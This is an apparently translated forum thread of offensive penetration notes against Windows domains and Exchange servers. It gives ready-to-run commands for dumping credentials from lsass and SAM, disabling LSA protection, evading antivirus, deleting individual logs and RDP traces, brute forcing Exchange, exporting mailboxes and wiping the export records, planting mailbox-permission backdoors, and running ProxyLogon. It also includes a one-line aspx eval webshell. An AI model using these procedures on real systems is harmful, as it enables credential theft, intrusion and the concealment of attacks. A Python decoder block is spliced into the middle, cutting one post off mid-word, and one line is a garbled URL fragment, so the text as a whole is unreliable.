    Connecting to a remote share with net use is also a logon process, so as long as there is a logon it will be reflected in the log. The same is true when logging in directly with dir and a host name. Log analysis found that hosts log on directly with Kerberos authentication. When using dir and net use, if the remote host is given as an IP, NTLM authentication is used; conversely, if a domain name or machine name is used, Kerberos is used.

    Member host connects to the domain controller with net use

    NTLM authentication packet
    net use \\10.10.10.10\ipc$
    From the command we know that this logon should be NTLM authentication. After multiple tests, it was found that if a member host uses the above command to connect to the domain controller, the following records are left on the domain controller.
    The first packet verifies the credentials of the account connecting to the domain controller. The second packet assigns permissions to the connection. The third packet is the successful-logon packet. In the third packet you can see the IP address, machine name and other information of the member host.
    S-1-0-0|-|-|0x0|S-1-5-21-3315874494-179465980-3412869843-1115|admins|VVVV1|0x889d1b|3|NtLmSsp|NTLM|WEB-2003|{000000000-0000-0000-00000-0000000000}|-|NTLM V1|128|0x0|-|10.10.10.3|1280|%%1833|-|-|%%1843|0x0|%%1842
    Therefore, you only need to remotely export the third, successful-logon packet and modify the filtering rules to obtain, from the log, the information of hosts that connected to the domain controller via net use.
    Use LogParser to export the log file:
    C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV "SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM \\10.10.10.10\Security WHERE strings LIKE '%|NTLM|%|%.%.%.%|%'"
    Through the strings field we can see the IP and host name of the host that connected to the domain controller.

    Kerberos authentication packet
    net use \\ad-2016\ipc$
    After multiple tests, it was found that if a member host connects to the domain controller with the above command using Kerberos authentication, the following records are left on the domain controller. Therefore, you only need to remotely export the fifth, successful-logon packet and modify the filtering rules to obtain the information of hosts that connected to the domain controller via net use.
    S-1-0-0|-|-|0x0|S-1-5-21-3315874494-179465980-3412869843-500|Administrator|VVVV1.COM|0x7c3dbeb9|3|Kerberos|Kerberos||{CE15C23A-E7E3-3FC1-4A75-FDF339BEC822}|-|-|0|0x0|-|10.10.10.12|50364|%%1840|-|-|-|%%1843|0x0|%%1842
    Use LogParser to export the log file:
    C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV "SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM \\10.10.10.10\Security WHERE strings LIKE '%|Kerberos|%|%.%.%.%|%' AND strings NOT LIKE '%|%$|%'"
    Through the strings field we can see the IP and account of the host that connected to the domain controller.

    Member host connects to the domain controller with dir

    NTLM authentication packet
    dir \\10.10.10.10\c$
    The principle is the same as net use; just export it directly with LogParser.
    C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV "SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM \\10.10.10.10\Security WHERE strings LIKE '%|NTLM|%|%.%.%.%|%'"

    Kerberos authentication packet
    dir \\ad-2016\c$
    The principle is the same as net use; just export it directly with LogParser.
    C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV "SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM \\10.10.10.10\Security WHERE strings LIKE '%|Kerberos|%|%.%.%.%|%' AND strings NOT LIKE '%|%$|%'"

    Member host connects to a member host
    dir \\10.10.10.10\c$
    dir \\web-2003\c$
    The first method, NTLM authentication, leaves only this log trace in the domain controller's log, which is almost useless; the main trace is in the log of the connected host. The second method, Kerberos authentication, leaves two logs on the domain controller: the TGT request and the ST request. The process of searching the logs is similar to the above, so I won't describe it here.

    Member host logs on by itself

    Only logons with a domain user account leave traces on the domain controller. If you log on with a local account, it is only reflected in the log of that machine. If you log on with a domain user, the domain controller authenticates with Kerberos, which is the same as the Kerberos authentication packet above.
    Use LogParser to export the log file:
    C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV "SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM \\10.10.10.10\Security WHERE strings LIKE '%|Kerberos|%|%.%.%.%|%' AND strings NOT LIKE '%|%$|%'"

    Query logs through a socks proxy

    Generally speaking, when we take down a boundary host, we build a socks tunnel and proxy our local host into the intranet to operate. First, use pass-the-hash to make sure the host outside the domain has sufficient permissions. After testing, the pass-the-hash operations did not generate log traces on the domain controller or on the socks tunnel client host.

    1. Query the host's logon records

    The commands and operations are the same as with VPN.

    2. Query the log traces left by connections

    Remote host connects to the domain controller with net use

    Because the Proxifier proxy tool cannot modify the DNS proxy in the socks environment, domain names and machine names cannot be resolved correctly. Therefore you can only operate by IP, which uses NTLM authentication.

    NTLM authentication packet
    net use \\10.10.10.10\ipc$
    From the command we know that this logon should be NTLM authentication. After multiple tests, it was found that if a member host uses the above command to connect to the domain controller, the following records are left on the domain controller.
    The first packet verifies the credentials of the account connecting to the domain controller. The second packet assigns permissions to the connection. The third packet is the successful-logon packet. In the third packet you can see the IP address, machine name and other information of the member host.
    S-1-0-0|-|-|0x0|S-1-5-21-3315874494-179465980-3412869843-1115|admins|VVVV1|0x889d1b|3|NtLmSsp|NTLM|WEB-2003|{000000000-0000-0000-00000-0000000000}|-|NTLM V1|128|0x0|-|10.10.10.3|1280|%%1833|-|-|%%1843|0x0|%%1842
    Therefore, you only need to remotely export the third, successful-logon packet and modify the filtering rules to obtain the information of hosts that connected to the domain controller via net use.
    Use LogParser to export the log file:
    C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV "SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM \\10.10.10.10\Security WHERE strings LIKE '%|NTLM|%|%.%.%.%|%'"
    Through the strings field we can see the IP and host name of the host that connected to the domain controller.

    Remote host connects to the domain controller with dir

    NTLM authentication packet
    Because the Proxifier proxy tool cannot modify the DNS proxy in the socks environment, domain names and machine names cannot be resolved correctly. Therefore you can only operate by IP, which uses NTLM authentication.
    dir \\10.10.10.10\c$
    The principle is the same as net use; just export it directly with LogParser.
    C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV "SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM \\10.10.10.10\Security WHERE strings LIKE '%|NTLM|%|%.%.%.%|%'"

    Remote host connects to a member host
    dir \\10.10.10.10\c$
    Both methods leave only this log trace in the domain controller's log, which is almost useless; the main trace is in the log of the connected host. The process of searching the logs is similar to the above, so I won't describe it here.

    PowerShell logs

    PowerShell logs are generally written directly to the system log. However, in the normal configuration PowerShell does not save the log of the commands it executes; it only saves the PowerShell start (ID 600) and PowerShell stop (ID 403) events. Therefore, during penetration, if we obtain an interactive shell, we can open PowerShell first and then execute commands; the log then only records the command that opened PowerShell and does not save the commands executed in the PowerShell terminal. However, if during the penetration we get a webshell, i.e. a semi-interactive command window, we can only put the commands into one statement, and that command is recorded in the log.

    PowerShell script usage

    When we use a PowerShell script to execute commands, we first need to run:
    Powershell -ExecutionPolicy Bypass
    This bypasses the PowerShell execution policy. PowerShell enables an execution policy by default, limiting script execution. The execution policy is a security mechanism that controls whether script files, and scripts from untrusted sources, are allowed to run. By default PowerShell's execution policy is set to 'Restricted', which means no script file is allowed to run. Using 'Powershell -ExecutionPolicy Bypass' on the command line bypasses the execution policy restriction and allows script files. This temporarily changes the execution policy to 'Bypass', allowing all scripts to run.

    If the ps1 script we are about to import is SharpHound.ps1:
    Import-Module ./SharpHound.ps1
    At this point the SharpHound module has been loaded into the current session.
    View all modules loaded in the current session:
    Get-Module
    Get a list of all commands in the SharpHound module:
    Get-Command -Module SharpHound
    Check the SharpHound usage help:
    Get-Help SharpHound
    get-help Invoke-BloodHound -full

    Delete logs

    In a penetration environment, deleting all logs will not cover our traces; it will instead make our traces more obvious. Therefore we can only delete individual logs, but Windows does not provide, or does not allow, deleting a single log, so we have to use other methods.
    Tool usage: https://github.com/3gstudent/Eventlogedit-evtx--Evolution
    Principle of deleting single logs: https://3gstudent.github.io/Windows-XML-Event-Log-(EVTX)%E5%8D%95%E6%9D%A1%E6%97%A5%E5%BF%97%E6%B8%85%E9%99%A4-%E4%B8%80-%E5%88%A0%E9%99%A4%E6%80%9D%E8%B7%AF%E4%B8%8E%E5%AE%9E%E4%BE%8B
    https://github.com/QAX-A-Team/EventCleaner

    Clear RDP login traces
    https://blog.csdn.net/m0_37552052/article/details/82894963
    https://blog.csdn.net/COCO56/article/details/102671007
20Client%5CDefault%201%203%20%E5%8F%B3%E9%94%AE%E7%82%B9%E5%87%BB%E9%9C%80%E8%A6%81%E7%AE%A1%E7%90%86%E7%9A%84%E8%AE%B0%E5%BD%95%E9%A1%B9%EF%BC%8C%E5%8F%AF%E4%BB%A5%E4%BF%AE%E6%94%B9%E6%88%96%E8%80%85%E5%88%A0%E9%99%A4%E6%AD%A4%E9%A1%B9%E3%80%82 https://blog.csdn.net/travelnight/article/details/122854895 Event ID: 1149: Record which source IPs were successfully logged into the local machine using RDP. Registration :HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\ This path records which servers the current host has logged into. Event ID: 5156 Log: You can see when the machine has accessed port 3389 of other servers. 4624 —— Account logged in successfully 4625 —— Account cannot be logged in 1149 —— User authentication is successful Reprinted from the original link address: https://forum.butian.net/share/3657
  26. Guest
    Get the plaintext password of the current machine

Before exporting the domain hashes, we can first try to export the local hash passwords of the current machine. If a domain user has logged in on this machine before, we can directly obtain the account of that domain user, or even the domain administrator. On the Windows operating system, the SAM database (C:\Windows\System32\config\sam) saves the hashes of the local users. In the local authentication process, the local security authority service process lsass.exe also caches the user password in memory (dmp file). Therefore, here we can consider two ways to grab the hashes of the current machine: online tool extraction and offline analysis extraction.

Note: In system versions after Windows 10 / 2012 R2, the system user's plaintext password is disabled by default in the memory cache. At this point, if you use mimikatz to grab plaintext, you will definitely not be able to catch it; the password field is displayed directly as null. Here we manually modify the registry to save the plaintext, so that we can grab it. (After modifying, you need to log out of the user and log in again.)

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

mimikatz

mimikatz is a powerful lightweight debugging tool developed by the Frenchman Benjamin. It was intended for personal testing, but because of its powerful functionality, which can directly read the plaintext passwords of operating systems such as Windows XP-2012, it is famous in penetration testing. It can be said to be a necessary tool for penetration.

Download address: https://github.com/gentilkiwi/mimikatz

1. Grab hashes through the registry

Execute the command line to get the SAM and SYSTEM files of the current system registry (requires local administrator rights):

reg save HKLM\SYSTEM Sys.hiv
reg save HKLM\SAM Sam.hiv

After obtaining the files, you can download them to the attacker's own machine and use mimikatz to analyze and extract the hashes offline.

mimikatz.exe "lsadump::sam /sam:Sam.hiv /system:Sys.hiv" "exit"

This method can only obtain the accounts of the local users saved in the SAM file.

2. Upload mimikatz to the target machine and extract the account hash values saved by the local SAM file online:

privilege::debug
token::elevate
lsadump::sam

3. Extract the hashes from the memory of lsass.exe:

mimikatz "privilege::debug" "sekurlsa::logonpasswords full" "exit"

It was found that the hash value of the domain administrator who had logged in to the local machine was captured using the administrator permissions of the local user.

pwdump7

Just run PwDump7.exe directly.

WCE

Upload it to the target machine and add parameters to run it directly.

-l List login sessions and NTLM credentials (default)
-s Modify the NTLM credentials of the current login session. Parameters: Username:Domainname:LMhash:NThash
-r Regularly list logged-in sessions and NTLM credentials. If a new session is found, it is relisted every 5 seconds.
-c Run a new session with the specified NTLM credentials. Parameters:
-e List login sessions and NTLM credentials indefinitely, relisting once whenever a logon event is generated
-o Save all output to a file. Parameter: file name
-i Specify a LUID instead of using the current login session. Parameter:
-d Delete NTLM credentials from a login session. Parameter:
-a Use address. Parameter: Address
-f Force safe mode
-g Generate hashes for LM and NT. Parameter: password
-K Cache Kerberos tickets to a file (unix and windows wce formats)
-k Read Kerberos tickets from a file and insert them into the Windows cache
-w Cache a plaintext password through digest authentication
-v Verbose output

LaZagne

Download address: https://github.com/AlessandroZ/LaZagne

LaZagne.exe all

SharpDump

https://github.com/GhostPack/SharpDump

Just compile it directly.

./Sharpdump

LsassSilentProcessExit

https://mp.weixin.qq.com/s/8uEr5dNaQs24KuKxu5Yi9w

Silent Process Exit, that is, exiting silently. This debugging technique can spawn the werfault.exe process, which can be used to run any program, to dump the memory file of any process, or to show a pop-up. It mainly uses the LsassSilentProcessExit API, which dumps memory by modifying the registry plus remote process injection. The related registry key values:

#define IFEO_REG_KEY "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"
#define SILENT_PROCESS_EXIT_REG_KEY "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\"

Use remote process injection to let lsass.exe call the RtlReportSilentProcessExit function itself:

HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
RtlReportSilentProcessExit_func RtlReportSilentProcessExit = (RtlReportSilentProcessExit_func)GetProcAddress(hNtdll, "RtlReportSilentProcessExit");
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)RtlReportSilentProcessExit, (LPVOID)-1, NULL, NULL);

However, since the registry needs to be modified, it is almost impossible to bypass an antivirus environment.

LsassSilentProcessExit.exe 616 0

How to dump the lsass process in sensitive environments

Use PowerShell to export without a file
https://blog.csdn.net/chenfeng857/article/details/120126818
https://xz.aliyun.com/t/12157#toc-9

comsvcs.dll comes with the system. Memory dumping is implemented through the exported function MiniDump of comsvcs.dll. When dumping the memory file of the specified process, the SeDebugPrivilege privilege is required. Under a cmd with administrator permissions, the SeDebugPrivilege privilege is held by default, but its status is Disabled. If you directly execute the rundll32 command under cmd and try to dump the memory file of the specified process, the dump fails because the SeDebugPrivilege privilege cannot be enabled. However, under PowerShell with administrator privileges, the SeDebugPrivilege privilege is held by default, and its status is Enabled.

First check the lsass.exe process PID:

tasklist | findstr lsass.exe

rundll32.exe comsvcs.dll MiniDump PID Path full
rundll32.exe comsvcs.dll MiniDump 1096 C:\Users\16229\Desktop\1.dmp full

If you run it directly, it may be intercepted by antivirus. A simple way to bypass it: copy comsvcs.dll to a non-sensitive directory with a random name, for example test.dll.

copy C:\windows\System32\comsvcs.dll test.dll
rundll32.exe C:\Users\16229\Desktop\code_java\test.dll MiniDump 1096 C:\Users\16229\Desktop\code_java\3.dmp full

Drag it to the local machine and use mimikatz for analysis:

mimikatz.exe log "sekurlsa::minidump 2.dmp" "sekurlsa::logonPasswords full" exit

In an environment where RunAsPPL is enabled

https://www.freebuf.com/articles/system/332506.html
https://xz.aliyun.com/t/12157#toc-19

mimikatz

With PPL protection enabled, even administrators cannot open the lsass process.

mimikatz "privilege::debug" "sekurlsa::logonpasswords full" "exit"

The mimikatz command privilege::debug succeeds in enabling SeDebugPrivilege, but the command sekurlsa::logonpasswords fails and error code 0x00000005 appears. From the kuhl_m_sekurlsa_acquireLSA() function in the mimikatz code, we can simply understand it as:

HANDLE hData = NULL;
DWORD pid;
DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION;
kull_m_process_getProcessIdForName(L"lsass.exe", &pid);
hData = OpenProcess(processRights, FALSE, pid);
if (hData && hData != INVALID_HANDLE_VALUE) {
    // if OpenProcess OK
} else {
    PRINT_ERROR_AUTO(L"Handle on memory");
}

Use Process Explorer to open the lsass process to view it, and access is denied.

Use the digitally signed driver in mimikatz to remove the protection flag of the Process object in the kernel.

mimikatz: install the driver

privilege::debug
!+

Delete the protection:

!processprotect /process:lsass.exe /remove

Then you can dump the passwords:

sekurlsa::logonpasswords

Use the tool to check that the protection has been deleted.

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"

PPLKiller

https://www.cnblogs.com/revercc/p/16961961.html
https://redcursor.com.au/bypassing-lsa-protection-aka-protected-process-light-without-mimikatz-on-windows-10/

Priority differences: a PP can open a PP or a PPL with full access as long as its signature level is greater than or equal to the target's; a PPL can open another PPL with full access as long as its signature level is greater than or equal to the target's; regardless of signature level, a PPL cannot open a PP with full access. With PPL enabled, only processes running at a higher protection level can operate on protected processes.

The Windows kernel uses the _EPROCESS structure to represent processes in kernel memory, which includes a _PS_PROTECTION field that defines the protection level of the process through its Type (_PS_PROTECTED_TYPE) and Signer (_PS_PROTECTED_SIGNER) properties.

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1; // Reserved
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

Although it is represented as a struct, all the information is stored in the two nibbles of a single byte (Level is a UCHAR, an unsigned char). The first 3 bits indicate the protection Type (see PS_PROTECTED_TYPE below). It defines whether the process is a PP or a PPL. The last 4 bits represent the Signer type (see PS_PROTECTED_SIGNER below), that is, the actual protection level.

typedef enum _PS_PROTECTED_TYPE {
    PsProtectedTypeNone = 0,
    PsProtectedTypeProtectedLight = 1,
    PsProtectedTypeProtected = 2
} PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE;

typedef enum _PS_PROTECTED_SIGNER {
    PsProtectedSignerNone = 0,      // 0
    PsProtectedSignerAuthenticode,  // 1
    PsProtectedSignerCodeGen,       // 2
    PsProtectedSignerAntimalware,   // 3
    PsProtectedSignerLsa,           // 4
    PsProtectedSignerWindows,       // 5
    PsProtectedSignerWinTcb,        // 6
    PsProtectedSignerWinSystem,     // 7
    PsProtectedSignerApp,           // 8
    PsProtectedSignerMax            // 9
} PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER;

If we want to bypass LSA protection, we can disable the PPL flag on the LSASS process by patching the EPROCESS kernel structure. To do this, we need to find the address of the LSASS EPROCESS structure and patch 5 values to zero: SignatureLevel, SectionSignatureLevel, Type, Audit, and Signer.

The EnumDeviceDrivers function can be used to leak the kernel base address. This can be used to locate PsInitialSystemProcess, which points to the EPROCESS structure of the System process. Since the kernel stores processes in a linked list, it is possible to use the ActiveProcessLinks member of the EPROCESS structure to iterate over the linked list and look for LSASS. Looking at the EPROCESS structure, we can see that the 5 fields we need to patch are conveniently aligned within 4 bytes. This allows us to patch the EPROCESS structure in a single 4-byte write, as follows:

WriteMemoryPrimitive(Device, 4, CurrentProcessAddress + SignatureLevelOffset, 0x00);

After finding the address, just patch the values of these four bytes to zero.

PPLKiller.exe /installDriver
tasklist | findstr lsass.exe
PPLKiller.exe /disablePPL 688

If you encounter a different kernel version and the program cannot patch the four bytes correctly, you can find a machine with the same version and view the lsass kernel address through windbg debugging.

bcdedit /debug on
srv*https://msdl.microsoft.com/download/symbols
.reload
!process 0 0 lsass.exe
dt _eprocess

Find the address 0x6c0, modify the script and then compile it.

PPLdump

https://itm4n.github.io/the-end-of-ppldump/
https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/

PPLdump is a tool written in C/C++ that implements a user-mode exploit, injecting arbitrary code into a PPL as an administrator. This technique is one of many findings from the in-depth research on protected processes (PP and PPL) by Alex Ionescu and James Forshaw. The working principle of PPLdump is as follows: Call AP
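To make the _PS_PROTECTION layout in the post above concrete, here is an added example (not code from the post, mimikatz or PPLKiller) that packs and unpacks the one-byte Level field exactly as the struct lays it out, using the enum values the post quotes, and evaluates the post's stated open-access rule between PP and PPL processes. The rule implemented is the post's simplification, not the kernel's full check; the sample levels are constructed.

```python
"""Decode _PS_PROTECTION Level bytes and apply the post's PP/PPL access rule."""
from dataclasses import dataclass
from enum import IntEnum


class ProtectedType(IntEnum):
    """_PS_PROTECTED_TYPE as quoted in the post (low 3 bits of Level)."""
    NONE = 0
    PROTECTED_LIGHT = 1   # PPL
    PROTECTED = 2         # PP


class ProtectedSigner(IntEnum):
    """_PS_PROTECTED_SIGNER as quoted in the post (high nibble of Level)."""
    NONE = 0
    AUTHENTICODE = 1
    CODEGEN = 2
    ANTIMALWARE = 3
    LSA = 4
    WINDOWS = 5
    WINTCB = 6
    WINSYSTEM = 7
    APP = 8
    MAX = 9


@dataclass(frozen=True)
class PsProtection:
    ptype: ProtectedType
    signer: ProtectedSigner
    audit: int = 0  # reserved bit 3, kept so that pack/unpack round-trips exactly

    @classmethod
    def from_level(cls, level: int) -> "PsProtection":
        """Split the Level byte: bits 0-2 Type, bit 3 Audit, bits 4-7 Signer.

        A signer nibble above 9 is outside the quoted enum and raises ValueError.
        """
        if not 0 <= level <= 0xFF:
            raise ValueError("Level is a single UCHAR")
        return cls(ProtectedType(level & 0x7),
                   ProtectedSigner(level >> 4),
                   (level >> 3) & 0x1)

    def to_level(self) -> int:
        return (int(self.signer) << 4) | (self.audit << 3) | int(self.ptype)

    @property
    def is_protected(self) -> bool:
        return self.ptype != ProtectedType.NONE

    def __str__(self) -> str:
        return f"0x{self.to_level():02x} ({self.ptype.name}/{self.signer.name})"


def can_open_full_access(caller: PsProtection, target: PsProtection) -> bool:
    """The post's rule set for one caller/target pair:

    - anything may open an unprotected target;
    - an unprotected caller may not open a protected target;
    - a PPL may never open a PP with full access;
    - otherwise the caller's signer must be >= the target's signer.
    """
    if not target.is_protected:
        return True
    if not caller.is_protected:
        return False
    if (caller.ptype == ProtectedType.PROTECTED_LIGHT
            and target.ptype == ProtectedType.PROTECTED):
        return False
    return caller.signer >= target.signer


def describe_patch(level: int) -> str:
    """Show what the post's 'patch Type, Audit and Signer to zero' does to a Level."""
    return f"{PsProtection.from_level(level)} -> {PsProtection.from_level(0)}"


if __name__ == "__main__":
    # Constructed values: 0x41 packs Light/Lsa (the Level lsass.exe carries
    # under RunAsPPL); 0x00 is an ordinary unprotected administrator process.
    lsass = PsProtection.from_level(0x41)
    admin_cmd = PsProtection.from_level(0x00)
    print("lsass:", lsass)
    print("unprotected admin process can open lsass:",
          can_open_full_access(admin_cmd, lsass))
    print(describe_patch(0x41))
```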
  27. Guest
    During the penetration process, the Exchange mail server is usually an object we focus on, because after taking down the Exchange mail server, with the permissions of its machine account we can grant other users in the domain DCSync permissions, then export the hashes in the domain and take down the entire domain.

In the Exchange system, configure PowerShell using the commands at https://learn.microsoft.com/zh-cn/powershell/module/exchange/add-mailboxfolderpermission?view=exchange-ps

Scanning for the service

setspn.exe
setspn.exe -T vvvv1.com -F -Q */* | findstr exchange

nmap
nmap 192.168.52.139 -A

Probe versions and vulnerabilities

Obtain the precise version information of Exchange through the EWS interface. Disadvantage: some old Exchange versions do not support this operation.

Get rough version information of Exchange through the OWA interface. After obtaining the version number, you can go to the official website to check the corresponding Exchange version and release date. Query address: https://learn.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2016

Use scripts to detect versions and vulnerabilities: https://github.com/3gstudent/Homework-of-Python/blob/master/Exchange_GetVersion_MatchVul.py

Brute forcing

python2 EBurst.py -d 192.168.52.139 -C

You can also use this tool to brute-force user account passwords.

python2 EBurst.py -d 192.168.52.139 -L ./users.txt -P ./passwords.txt --ews

Information collection

Assuming that the credentials of one of the email users have been obtained, information can be collected next.

Information collection through Autodiscover

The https://Exchange/autodiscover/autodiscover.xml interface accepts XML requests and returns the mailbox configuration to which the email address specified in the XML belongs. Because NTLMv2 authentication requires an HTTP/1.1 connection, and the new version of Burp Suite defaults to HTTP/2, we need to adjust it first.
https://blog.csdn.net/qq_30786785/article/details/121742101

For operations such as reading the configuration, please refer to the following link:
https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Exchange-Autodiscover%E7%9A%84%E4%BD%BF%E7%94%A8

Here Basic is the authentication, encoded with base64: VVVV1\administrator:admin!@#456

POST /autodiscover/autodiscover.xml HTTP/1.1
Host: 192.168.52.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Authorization: Basic VlZWVjFcYWRtaW5pc3RyYXRvcjphZG1pbiFAIzQ1Ng==
Content-Type: text/xml
Content-Length: 350

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
  <Request>
    <EMailAddress>[email protected]</EMailAddress>
    <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
  </Request>
</Autodiscover>

If the email address does not exist, an error is returned. If the mailbox exists, the configuration information is returned.

Get the Exchange address book

The Global Address List (GAL) contains the email addresses of all email users in the Exchange organization. As long as you obtain the credentials of any email user in the Exchange organization, you can export the email addresses of the other email users. You can use OWA, EWS, OAB, RPC over HTTP, MAPI over HTTP, etc. to obtain the GAL.
https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E8%8E%B7%E5%BE%97Exchange-GlobalAddressList%E7%9A%84%E6%96%B9%E6%B3%95
https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/

Use OWA to view it directly: People - All Users

Get the GAL through the /EWS interface:

Powershell -ExecutionPolicy Bypass
Import-Module .\MailSniper.ps1
Get-GlobalAddressList -ExchHostname 192.168.52.139 -UserName VVVV1\administrator -Password admin!@#456 -OutFile gal.txt

Get the GAL through OAB

1. Collect the OAB path through Autodiscover;
2. Access /OAB/OABURI/oab.xml;
3. Find the LZX file address corresponding to the default global address list through oab.xml, and access /OAB/OABURI/LZXURI to obtain the LZX file;
4. Use the cabextract tool to decode the LZX file and restore the GAL: https://www.cabextract.org.uk/

Export the GAL and collect information through RPC (MAPI) over HTTP

MAPI over HTTP is the default communication protocol between Outlook and Exchange 2016. MAPI over HTTP is a new transport protocol implemented in Exchange Server 2013 Service Pack 1 (SP1) to replace RPC over HTTP (also known as Outlook Anywhere). MAPI over HTTP is not enabled by default in Exchange 2013; there the communication protocol between Outlook and Exchange uses RPC over HTTP.

Use the impacket exchanger module to list the address lists and find the corresponding GUID:

python exchanger.py VVVV1/admins:User!@#[email protected] list-tables

Export all users:

python exchanger.py VVVV1/admins:User!@#[email protected] dump-tables -guid 784f58c1-8bd1-4d28-81fa-52d22ce95738

Remote export of the GAL through Python:

python ewsManage_Downloader.py 192.168.52.139 443 plaintext vvvv1.com admins User!@#45 findallpeople

Export email content

Download emails directly through the /OWA interface: enter the account password, then read or download the emails directly in the page.

Export email content through the /EWS interface

Remote export of emails through Python. It can be exported with a plaintext password or a hash:

python ewsManage_Downloader.py 192.168.52.139 443 plaintext vvvv1.com administrator admin!@#456 download
python ewsManage_Downloader.py test.com 80 ntlmhash NULL user1 c5a237b7e9d8e708d8436b6148a25fa1 findallpeople

Exporting emails through Python generally uses SOAP XML messages. Official XML elements documentation: https://learn.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-xml-elements-in-exchange

Export emails through exshell.ps1
https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8EExchange%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E6%90%9C%E7%B4%A2%E5%92%8C%E5%AF%BC%E5%87%BA%E9%82%AE%E4%BB%B6

Powershell.exe -psconsolefile "C:\program files\Microsoft\Exchange Server\v15\Bin\exshell.psc1" -command "New-MailboxExportRequest -mailbox administrator -filepath '\\localhost\c$\exchange1.pst'"

Of course, after exporting the email, we also need to clear the traces of the mail export.

View the mail export request history:

Powershell.exe -psconsolefile "C:\program files\Microsoft\Exchange Server\v15\Bin\exshell.psc1" -command "Get-MailboxExportRequest"

Delete the export log records:

Powershell.exe -psconsolefile "C:\program files\Microsoft\Exchange Server\v15\Bin\exshell.psc1" -command "Remove-MailboxExportRequest"

The Identity parameter is the Mailbox parameter in the figure above.

Powershell.exe -psconsolefile "C:\program files\Microsoft\Exchange Server\v15\Bin\exshell.psc1" -command "Remove-MailboxExportRequest -Identity 'vvvv1.com/Users/Administrator\MailboxExport' -Confirm:$false"

Mail takeover backdoor planting

Configure impersonation permissions
https://4sysops.com/archives/exchange-impersonation-grant-permissions-to-service-accounts/

Just add the following permissions. Verify that the impersonation permission exists: https://192.168.52.139/ecp/[email protected]/

Specific exploitation requires combining it with script files.

View members with impersonation permission:

Get-ManagementRoleAssignment -Role:ApplicationImpersonation
Powershell.exe -psconsolefile "C:\program files\Microsoft\Exchange Server\v15\Bin\exshell.psc1" -command "Get-ManagementRoleAssignment -Role:ApplicationImpersonation"

Create a new member with impersonation permission:

New-ManagementRoleAssignment -Role:ApplicationImpersonation -User:[email protected]

Delete the newly added member with impersonation permission:

Remove-ManagementRoleAssignment "ApplicationImpersonation-admins"

Configure FullAccess permissions
https://blog.csdn.net/weixin_34123613/article/details/90079532

Get-Mailbox -ResultSize unlimited -Filter {(RecipientTypeDetails -eq 'UserMailbox') -and (Alias -ne 'Administrator')} | Add-MailboxPermission -User administrator -AccessRights fullaccess -InheritanceType all

Cancel FullAccess permissions:

Get-Mailbox -ResultSize unlimited -Filter {(RecipientTypeDetails -eq 'UserMailbox') -and (Alias -ne 'Administrator')} | Remove-MailboxPermission -User administrator -AccessRights fullaccess -InheritanceType all

Verify FullAccess permissions

Vulnerability attack

python ProxyLogon.py --host=exchange.com [email protected]

aspx Trojan:

<script language="JScript" runat="server">function Page_Load(){/**/eval(Request['command'],'unsafe');}</script>

Post-exploitation stage

Exchange server information collection

Get the default installation path of Exchange:

echo %ExchangeInstallPath%

The relative location of the console file is %ExchangeInstallPath%\Bin\exshell.ps1

Get all mailbox information:

powershell.exe -psconsolefile "C:\Program Files\Microsoft\Exchange Server\V15\bin\exshell.psc1" -command "get-mailbox -resultsize unlimited"

Analyze the message tracking log

The message tracking log is located in %Excha
  28. Guest
    Under normal circumstances, lateral movement is performed once sufficient permissions have been obtained. Most of the following methods also require high-privilege operations.
https://www.freebuf.com/articles/network/251364.html

There are three situations for lateral movement in the intranet:
1. Lateral movement in a VPN environment;
2. Lateral movement in a socks proxy environment;
3. Lateral movement in the environment of a remote Trojan;

File transfer - preparation

In the process of lateral movement, the first thing we should consider is the file transfer scheme, which provides convenience for later deploying attack payloads or other files to the attack target.

Network sharing

In Windows, the network sharing function implements file sharing within a local area network. Provide valid user credentials to transfer files from one machine to another.

Get the network shares enabled by default in Windows:

net share

In practice, the IPC$ connection is often used, and an IPC$ connection has two requirements:
1. The remote host has IPC connections enabled;
2. Ports 139 and 445 of the remote host are open;

